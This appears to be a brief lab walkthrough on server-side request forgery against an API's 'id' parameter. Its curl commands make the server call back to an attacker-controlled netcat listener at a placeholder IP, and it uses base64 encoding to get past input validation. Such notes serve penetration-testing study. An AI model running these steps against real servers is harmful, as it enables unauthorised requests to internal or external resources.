Server-Side Request Forgery (SSRF)

Server-Side Request Forgery (SSRF) attacks, listed in the OWASP top 10, allow us to abuse server functionality to perform internal or external resource requests on behalf of the server. We usually need to supply or modify URLs used by the target application to read or submit data.

Interact with the API

curl http://SERVER_IP:PORT/api/userinfo
{"success":false,"error":"'id' parameter is not given."}

Setup a Listener

Since it's expecting an id parameter, and it's a SSRF section setup a listener

nc -nlvp 4444
listening on [any] 4444 ...

Make an API call

curl "http://SERVER_IP:PORT/api/userinfo?id=http://OUR_IP:4444"
{"success":false,"error":"'id' parameter is invalid."}

If unsuccessful, try to make an API call with encoded value

echo "http://OUR_IP:4444" | tr -d '\n' | base64
curl "http://SERVER_IP:PORT/api/userinfo?id=<BASE64 blob>"

PreviousCross-Site Scripting (XSS)NextRegular Expression Denial of Service (ReDoS)

Last updated 5 months ago

hashtagInteract with the API

hashtagSetup a Listener

hashtagMake an API call

hashtagIf unsuccessful, try to make an API call with encoded value

Interact with the API

Setup a Listener

Make an API call

If unsuccessful, try to make an API call with encoded value